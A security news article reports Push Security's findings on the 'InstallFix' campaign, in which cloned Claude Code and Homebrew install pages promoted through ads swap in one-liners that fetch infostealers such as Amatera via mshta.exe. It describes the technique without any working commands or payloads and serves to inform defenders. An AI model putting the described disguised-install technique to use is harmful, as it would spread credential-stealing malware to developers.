Malware & Threats Cloned AI Tool Sites Distribute Malware in ‘InstallFix’ Campaign Threat actors replace legitimate commands on the cloned installation webpages with malicious commands. By Ionut Arghire | March 9, 2026 (6:42 AM ET) Flipboard Reddit Whatsapp Whatsapp Email A new variant of the ClickFix attack relies on cloned webpages for popular development tools to distribute information-stealing malware, Push Security reports. As part of the campaign, dubbed InstallFix , threat actors rely on malvertising to lure victims to legitimate-looking malicious installation pages on which install commands have been replaced with rogue ones. One variant of the attack abuses users’ interest in Anthropic’s Claude Code CLI tool, using malicious advertisements distributed exclusively through Google Ads, increasing the visibility of the cloned page via sponsored search results. The cloned page is a near-pixel-perfect replica of the legitimate one. The install one-liner on it, however, points to an attacker-controlled server that distributes an infostealer, instead of fetching the install script for Claude Code. “Unless you’re carefully reading the URL embedded in the install one-liner (and let’s be honest, almost nobody does these days), the page is indistinguishable from the real one,” Push Security notes. Once the victim triggers the execution chain, cmd.exe spawns mshta.exe to retrieve and run code from a remote server, resulting in an Amatera Stealer infection. Advertisement. Scroll to continue reading. “We saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign,” Push Security says. The cybersecurity firm also notes that threat actors are abusing legitimate domains such as Cloudflare Pages, Squarespace, and Tencent EdgeOne to host malicious content and blend with normal web traffic. Threat actors were also seen hosting malicious terminal commands on public pages on claude.ai, distributing the Cuckoo infostealer via clones of the Homebrew website, hosting rogue OpenClaw installers in GitHub repositories, and distributing malware through NPM packages mimicking Claude Code. “But this isn’t just a Claude problem — any tool or site that is likely to get clicks, and can be easily cloned, is a potential target for malvertising and impersonation,” Push Security notes. Related: Microsoft Warns of ClickFix Attack Abusing DNS Lookups Related: Malicious Chrome Extension Crashes Browser in ClickFix Variant ‘CrashFix’ Related: Hackers Weaponize Claude Code in Mexican Government Cyberattack Related: Infostealer Malware Delivered in EmEditor Supply Chain Attack Written By Ionut Arghire Ionut Arghire is an international correspondent for SecurityWeek. More from Ionut Arghire Iranian APT Hacked US Airport, Bank, Software Company Reclaim Security Raises $20 Million to Accelerate Remediation Cisco Patches Critical Vulnerabilities in Enterprise Networking Products AI Security Firm JetStream Launches With $34 Million in Seed Funding Google Plans Two-Week Release Schedule for Chrome Global Coalition Publishes 6G Security and Resilience Principles Critical FreeScout Vulnerability Leads to Full Server Compromise 1.2 Million Affected by University of Hawaii Cancer Center Data Breach Latest News Recent Cisco Catalyst SD-WAN Vulnerability Now Widely Exploited US Cyber Strategy Targets Adversaries, Critical Infrastructure, and Emerging Technologies Over 100 GitHub Repositories Distributing BoryptGrab Stealer Pentagon’s Chief Tech Officer Says He Clashed With AI Company Anthropic Over Autonomous Warfare FBI Investigating ‘Suspicious’ Cyber Activity on System Holding Sensitive Surveillance Information ArmorCode Raises $16 Million for Exposure Management Platform In Other News: FBI Hacked, US Security Pro Killed in Iran War, Hijacked Cameras Used in Khamenei Strike CISA Adds iOS Flaws From Coruna Exploit Kit to KEV List Trending Daily Briefing Newsletter Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts. Webinar: Securing Fragile OT in an Exposed World March 10, 2026 Get a candid look at the current OT threat landscape as we move past "doom and gloom" to discuss the mechanics of modern OT exposure. Register Virtual Event: Supply Chain Security and Third-Party Risk Summit March 18, 2026 Join the event where top security experts unpack the biggest software supply chain risks. Register People on the Move ArmorCode has named Phil Venables to its Board of Directors. James ‘Aaron’ Bishop has been appointed as new Pentagon CISO. Sonalee Parekh has joined SentinelOne as Chief Financial Officer. More People On The Move Expert Insights Four Risks Boards Cannot Treat as Background Noise The goal isn’t about preventing every attack but about keeping the business running when attacks succeed. (Steve Durbin) How to Eliminate the Technical Debt of Insecure AI-Assisted Software Development Developers must view AI as a collaborator to be closely monitored, rather than an autonomous entity to be unleashed. Without such a mindset, crippling tech debt is inevitable. (Matias Madou) Security in the Dark: Recognizing the Signs of Hidden Information Security failures don’t always start with attackers, sometimes they start with missing truth. (Joshua Goldfarb) Living off the AI: The Next Evolution of Attacker Tradecraft Living off the AI isn’t a hypothetical but a natural continuation of the tradecraft we’ve all been defending against, now mapped onto assistants, agents, and MCP. (Etay Maor) Why We Can’t Let AI Take the Wheel of Cyber Defense The fastest way to squander the promise of AI is to mistake automation for assurance, and novelty for resilience. (Steve Durbin) Flipboard Reddit Whatsapp Whatsapp Email